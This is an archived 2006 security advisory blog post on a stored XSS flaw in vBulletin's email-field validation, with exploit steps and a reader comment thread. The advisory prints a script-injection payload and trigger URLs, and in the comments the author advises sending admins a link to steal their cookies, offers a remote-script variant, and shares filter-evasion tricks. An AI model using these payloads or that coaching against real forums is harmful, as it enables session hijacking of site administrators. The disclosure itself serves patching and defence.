Search
Home

imei Addmimistrator’s BugBlog

imei’s security Advisories and researches

« WordPress2.0.0~authors’website~XSS attack
CuteNews1.4.1~ AddCommentForProtectedUserNames~ XSS Attack »

vBulletin3.0.12&3.5.3~is_valid_email()~XSS Attack

——–Summary——–
Software: vBulletin
Sowtware’s Web Site: http://www.vBulletin.com
Versions: 3.0.12-3.5.3
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Available
Discovered by: imei addmimistrator
Risk Level: Mediume
——-Description——-
There is a security bug in most powerfull & common forum software vBulletin version 3.0.12&3.5.3 that allows attacker performe a XSS attack. bug is in result of unsentizing quotation and < & > characters for “email” field of users’ information. a weak regular expression for validation email that allows insertiong unvalid characters in domain-name section of email is source of this bug and also forgot to htmlspeacialcharing output value in sendmsg.php file, helps exploiting this bug. a successfull attack can result to thefthing cookies, hijacking pages and etc…
——-Conditions——-
AdminSetting Should meeted these settings:
Enable Email features=Yes
Allow Users to Email Other Members=Yes
Use Secure Email Sending=No
forum/admins/options.php?do=options&dogroup=email
It sounds that conditions are defaultly OK;
——-Exploit——-
Scenario:
/forum/profile.php?do=editpassword
pass:your pass
email: imei@myimei.com”><script>alert(1)</script>.nomatt
Note About lenght limitation ;)
****
forum/profile.php?do=editoptions
Receive Email from Other Members=yes
****
forum/sendmessage.php?do=mailmember&u={your id}
——-Solution——-
Upgrade to vendore provided patch.
——-Credit——-
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
www.myimei.com
myimei.com/security

Posted by imei on Sunday, February 19th, 2006 at 3:58 am.

20 Responses to “vBulletin3.0.12&3.5.3~is_valid_email()~XSS Attack”

    http://www.vbulletin.com/forum/showthread.php?t=176170
    http://www.vbulletin.com/forum/showthread.php?t=176176

    Left by imei on February 24th, 2006

    baba inkaare!!!!!

    Left by Folaani on March 8th, 2006

    How we can do it?How we can hack a site by using this way

    Left by OpTiMuS on March 12th, 2006

    did your target forum has above mentioned conditions?
    if yeah, enter exp text as your email and send a link of sendmsg.php to admins. you should alter that text to send his cookies to your script.
    i am sorry about more detailes. we dont wana TEACH hack.
    however there are many documents about XSS hacking.
    regs
    imei

    Left by imei on March 12th, 2006

    how can i close that bug??

    reg

    jeme

    Left by jeme on March 12th, 2006

    upgrade plz. vb provids a patch for this bug.(I concert with them and didnt public this vefor awaring vendor) 3.0.13 is patched for 3.0.12 and 3.5.4 is safe version of whom that have 3.5.3 version.
    be beauty.
    imei

    Left by imei on March 13th, 2006

    if you really can hack vBulletin Version 3.5.3 then ill give you money :) just contact me and we will have a deal :)

    Left by Emad on April 27th, 2006

    ِDear Emad.
    It is a website for going to a SeQre world~ not a “How to hack” one. I dont need to show can i or can not i hack a vbulletin system. what that i need was what i got it! security sites, also vbulletin.com itself verified this bug and all things are ok!
    btw if you’d like to learn XSS I can help you;) :)

    Left by imei on April 27th, 2006

    http://www.securityfocus.com/bid/16919

    Left by imei on April 28th, 2006

    More serious code than alert(1) cannot be typed due to length limitation (50). I even cannot call this bug “vulnerability”.

    Left by Trasser on May 3rd, 2006

    Exploiting a bug is another science in comparision with finding bug. security bugs have not need to have a clear exploit for calling them “vulnerability”.
    btw i didnt want to spend more time for a patched and accepted bug but you as an interested person may like work on this one!

    i{at}ii.ii”><script src=”aaa.aa/a.js”></script>.no

    Left by imei on May 4th, 2006

    Left by Trasser on May 17th, 2006

    2IMEI: spaces are not allowed, this e-mail will be errorneous.

    Left by Trasser on May 17th, 2006

    i{at}ii.ii”><script”"src=”aaa.aa/a.js”></script>.no

    What about this dear?

    Left by imei on May 17th, 2006

    Nothing. %20 not allowed, %a0 allowed but doesn’t work, ”” also allowed but doesn’t work.

    Left by Trasser on May 18th, 2006

    Work on it Trasser. there is some trix about XSS, i show you one of them. as a ultimate solution I offer you : Dont close <a tag that shows the mail link. after that you can inject events without space seperator;))
    regs

    Left by imei on May 20th, 2006

    man,,thanx for this one,,can i know wer r u from ?

    Left by JustMe on May 25th, 2006

    Yes Sir. It is my About Me ;)
    http://myimei.com/security/about-me/

    Left by imei on May 26th, 2006

    can i have the best exploit plz ??

    Left by SjK on May 27th, 2006

    Hai Friends,

    vBulletin is one of the best software on the market today for all medium-to-large sites which allows attacker to perform a XSS attack as well as vulnerability in vBulletin 3.0 can be exploited by people to conduct SQL injection attacks.

    Thanks,
    http://www.seoblogcentral.com

    seoblogcentral - vbulletin,jelsoft,forum,bbs,discussion,bulletin board,message board,blog,discussion forum

    Left by seoblogcentral01 on May 19th, 2009

Something to say?

You must be logged in to post a comment.